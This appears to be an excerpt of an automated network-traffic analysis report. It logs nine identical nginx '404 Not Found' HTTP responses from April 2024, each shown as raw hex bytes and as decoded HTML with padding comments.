                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:07:21 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:07:23 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:07:26 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:07:28 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:08:48 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:08:51 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:08:54 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:08:57 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:09:00 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
